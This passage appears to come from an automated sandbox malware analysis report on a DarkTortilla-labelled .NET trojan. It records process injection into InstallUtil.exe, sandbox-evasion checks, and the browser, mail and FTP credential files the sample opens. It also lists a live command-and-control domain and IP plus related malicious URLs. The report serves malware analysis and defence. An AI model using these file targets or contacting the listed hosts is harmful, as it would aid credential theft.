                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597796Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597359Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597250Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596921Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596046Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595718Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594843Jump to behavior
                        Source: wva4mZuUb4.exe, 00000000.00000002.1922738564.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, wva4mZuUb4.exe, 00000000.00000002.1909018822.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                        Source: wva4mZuUb4.exe, 00000000.00000002.1909018822.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q#SOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: InstallUtil.exe, 0000000A.00000002.2492410266.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: CCE008Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeQueries volume information: C:\Users\user\Desktop\wva4mZuUb4.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.401b818.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f9dfba.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f744ea.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3ff153a.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.401b818.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f9dfba.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f744ea.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3ff153a.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2491018423.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2436, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2436, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.401b818.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f9dfba.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f744ea.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3ff153a.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.401b818.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f9dfba.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f744ea.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3ff153a.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2491018423.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2436, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Valid Accounts
                        121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Encrypted Channel
                        1
                        Exfiltration Over Alternative Protocol
                        Abuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        Valid Accounts
                        1
                        Valid Accounts
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        Credentials in Registry
                        24
                        System Information Discovery
                        Remote Desktop Protocol2
                        Data from Local System
                        1
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Access Token Manipulation
                        2
                        Obfuscated Files or Information
                        Security Account Manager111
                        Security Software Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
                        Process Injection
                        12
                        Software Packing
                        NTDS1
                        Process Discovery
                        Distributed Component Object ModelInput Capture11
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets141
                        Virtualization/Sandbox Evasion
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain Credentials1
                        Application Window Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Valid Accounts
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                        Virtualization/Sandbox Evasion
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                        Process Injection
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                        Hidden Files and Directories
                        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        wva4mZuUb4.exe71%ReversingLabsByteCode-MSIL.Trojan.DarkTortilla
                        wva4mZuUb4.exe100%AviraTR/Kryptik.vxcuo
                        wva4mZuUb4.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://aminhacorretora.com.br100%Avira URL Cloudmalware
                        http://ftp.aminhacorretora.com.br100%Avira URL Cloudmalware
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        aminhacorretora.com.br
                        162.241.203.30
                        truetrue
                          unknown
                          ftp.aminhacorretora.com.br
                          unknown
                          unknowntrue
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://aminhacorretora.com.brInstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://ftp.aminhacorretora.com.brInstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              162.241.203.30
                              aminhacorretora.com.brUnited States
                              26337OIS1UStrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1569286
                              Start date and time:2024-12-05 17:27:47 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 22s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:wva4mZuUb4.exe
                              renamed because original name is a hash value
                              Original Sample Name:872f1970c19bbf2031fe43f9ed034f1edd2763e6ecda2de368336da3312d8463.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/4@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 141
                              • Number of non-executed functions: 29
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: wva4mZuUb4.exe
                              TimeTypeDescription
                              11:28:44API Interceptor219x Sleep call for process: wva4mZuUb4.exe modified
                              12:39:28API Interceptor571x Sleep call for process: InstallUtil.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              162.241.203.30S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                              • nossoplayer.me/admin/
                              RjGM2z2Z3gVHbRl.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/eauu/?DZDL=WHu5pNat8uHfzRxaB9vtQ4eIh6FN4j/LlAnIasWF7xCzNp7gljTYY7GdEKRxmLt8YdbcyrQMPNW8Q0wryNhuApS+Kh6rZS0ucw==&XJE=v0GXajs0Cfa
                              PI5102295.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?4hzh=z6Y8Z0&a8GP-0=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL553wQlR/hos/LA==
                              SecuriteInfo.com.Trojan.GenericKD.61688138.7209.1529.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?bH=ZR2t9tZxXpFp&j48x=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL58jtUiF/uIknLA==
                              ZsFMADRfZB.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?2dyL8P=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlO3cbHe0QClKYeKQ==&I6Ah=eFQ8RbYHBTF0_Z
                              SecuriteInfo.com.Trojan.DownLoaderNET.447.13310.17565.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?t0GX=kdo4s&9rW=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw
                              SecuriteInfo.com.Trojan.DownloaderNET.345.11377.31950.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?9ro=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw&q2ML=zTqLQN
                              SKMB610952.jsGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              aminhacorretora.com.brHangarskibenes.exeGet hashmaliciousGuLoaderBrowse
                              • 162.241.203.30
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              OIS1USXc501VOacR.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              umVoLahqZn.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              tTXQS6DONV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              dY1ZxYJOz7.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              i9QKJCpVZJ.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                              • 192.185.147.100
                              Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 192.185.147.100
                              https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627Get hashmaliciousHTMLPhisherBrowse
                              • 162.241.71.126
                              http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrmGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              No context
                              No context
                              Process:C:\Users\user\Desktop\wva4mZuUb4.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLV1qE4x84qpE4KlKDE4KhKiKhIE4KnKIE4oKNzKoZAE4Kze0E4j:Mp1qHxv2HKlYHKh3oIHKntHo6hAHKzea
                              MD5:8275047EA04782E18195CE5F2F076225
                              SHA1:86FE553781E50EE2493A6D54A2F329FF94AD0DEE
                              SHA-256:302DE184C80A778557AA7F09DDCAB59FED5712B6BC617FDEAFE1E004021FFDDC
                              SHA-512:4F7B9BE379C98D5E9609D46FC0B473C66A977C3A081C60872CB8FE344C2785A285E9D9019D49515A6DC5D1E6EFF2D8DD5E5BA49086AF24F8A2F50E6B9EBE588B
                              Malicious:true
                              Reputation:moderate, very likely benign file
